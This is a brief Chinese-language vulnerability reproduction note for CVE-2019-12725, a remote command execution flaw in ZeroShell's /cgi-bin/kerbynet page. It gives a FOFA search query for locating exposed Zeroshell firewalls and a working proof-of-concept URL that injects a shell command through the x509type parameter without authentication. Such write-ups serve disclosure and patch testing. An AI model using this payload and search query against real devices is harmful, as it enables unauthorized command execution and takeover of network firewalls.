# ZeroShell 3.9.0 远程命令执行漏洞 CVE-2019-12725

## 漏洞描述

ZeroShell 3.9.0 存在命令执行漏洞，/cgi-bin/kerbynet 页面，x509type 参数过滤不严格，导致攻击者可执行任意命令

## 漏洞影响

```
ZeroShell < 3.9.0
```

## FOFA

```
app="Zeroshell-防火墙"
```

## 漏洞复现

登录页面如下



![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162258497.png)

验证的POC为

```plain
/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27
```

![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162258777.png)